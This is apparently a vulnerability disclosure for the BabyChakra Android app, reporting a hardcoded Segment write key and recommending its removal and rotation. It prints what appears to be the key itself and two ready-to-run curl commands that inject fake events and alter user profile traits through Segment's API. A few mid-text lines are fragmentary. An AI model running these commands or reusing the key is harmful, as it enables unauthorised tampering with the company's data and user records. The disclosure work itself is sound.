In the Android application app.babychakra.babychakra version 5.4.3.0, a hardcoded Segment write key was discovered in the source file app/babychakra/babychakra/Configuration.java. An attacker can extract this key through reverse engineering and use it to send arbitrary tracking events and modify user profiles via Segment’s API. This allows injection of fraudulent analytics data, potentially leading to corrupted business intelligence, incorrect user segmentation, and misuse of downstream systems that rely on this data.
app/babychakra/babychakra/Configuration.java:
/track endpoint to inject a fake event/identify endpoint to alter a user’s profile
The server returns {"success": true}, confirming the event was accepted.
In Segment's architecture, the write key acts as the sole credential for authenticating requests to its HTTP API. When hardcoded in the apk, an attacker can extract it and directly call the /track endpoint to inject arbitrary user events, and the /identify endpoint to modify user traits (e.g., email, membership level) for any user ID, thereby gaining full write access to the analytics data stream and enabling data pollution and profile tampering.
Remove the hardcoded Segment write key from the client, rotate the compromised key, and route all analytics calls through a secure backend proxy with authentication, rate limiting, and secure credential storage.
Inject a fake event
curl -X POST <https://api.segment.io/v1/track> \\
-u dkNeZGsUPg9RnM2oyuwwV64N9WfcP8NO: \\
-H 'Content-Type: application/json' \\
-d '{
"userId": "test_user_123",
"event": "Test Event from APK",
"properties": { "source": "reverse_engineered" }
}'
Alter a user’s profile
curl -X POST <https://api.segment.io/v1/identify> \\
-u dkNeZGsUPg9RnM2oyuwwV64N9WfcP8NO: \\
-H 'Content-Type: application/json' \\
-d '{
"userId": "test_user_123",
"traits": {
"name": "Fake User",
"email": "attacker@example.com",
"plan": "enterprise"
}
}'